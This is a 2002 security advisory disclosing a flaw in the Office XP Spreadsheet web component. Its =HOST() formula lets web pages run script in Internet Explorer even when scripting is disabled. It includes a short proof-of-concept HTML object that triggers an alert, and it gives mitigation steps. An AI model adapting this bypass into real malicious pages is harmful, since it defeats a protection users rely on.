Scripting for the scriptless with OWC in IE (GM#005-IE)

From: GreyMagic Software (security@GREYMAGIC.COM)
Date: 04/08/02


Date:         Mon, 8 Apr 2002 17:18:11 +0200
From: GreyMagic Software <security@GREYMAGIC.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

GreyMagic Security Advisory GM#005-IE
=====================================

By GreyMagic Software, Israel.
08 Apr 2002.

Available in HTML format at http://security.greymagic.com/adv/gm005-ie/.

Topic: Scripting for the scriptless with OWC in IE.

Discovery date: 10 Mar 2002.

Affected applications:
======================

Office XP - Office Web Components 10, Spreadsheet component.

Introduction:
=============

Office Web Components (OWC) is a group of safe for scripting components used
to enrich HTML documents with Spreadsheets, Charts, Pivot tables and more.

OWC ships with the Microsoft Office package, but it is also downloadable as
a separate (free for viewing only) component.

Discussion:
===========

Office XP introduced OWC10, which added many interesting features. One of
the features added to the Spreadsheet component is the "=HOST()" formula,
which returns a handle to the hosting environment.

It is possible to use this formula in order to manipulate the DOM, which is
a security issue in itself when Active Scripting is disabled, but it's
somewhat limited because there's no way to add logic (conditions, loops,
etc.) to the calls made.

However, with a bit of manipulation it is possible to get Active Scripting
to kick in. By using the setTimeout method of the window object through the
"=HOST()" formula it is possible to execute script with any language
available to the host (IE).

Exploit:
========

This example will display a message box even when scripting is disabled; it
contains many quotes because several levels of escaping are needed:

<object classid="clsid:0002E551-0000-0000-C000-000000000046"
style="display:none">
    <param
        name="csvdata"
        value='"=HOST().parentWindow.setTimeout(""var i=20; alert(i+""""+3
equals """"+(i+3));"",10,""jscript"")"'
>
</object>

Solution:
=========

If you prefer browsing with Active Scripting disabled then make sure to set
"Run ActiveX controls and plug-ins" to "Disable" as well. Unfortunately,
this will also prevent you from viewing other components, such as Flash for
example, so you may prefer to temporarily disable the Spreadsheet component.

Microsoft has been informed, they have opened an investigation regarding
this issue.

Tested on:
==========

IE5.5sp2 NT4 sp6a + OWC10, all patches.
IE6sp1 Win2000 + OWC10, all patches.
IE6sp1 WinXP + Office XP (OWC10), all patches.

Demonstration:
==============

We put together two proof-of-concept demonstrations; please disable Active
Scripting before viewing them in order to see how it is bypassed:

* Simple: the example shown in the "Exploit" section.
* Advanced: lets the user write the script, choose the scripting language
and execute.

They can both be found at http://security.greymagic.com/adv/gm005-ie/.

Feedback:
=========

Please mail any questions or comments to security@greymagic.com.

- Copyright 2002 GreyMagic Software.



Relevant Pages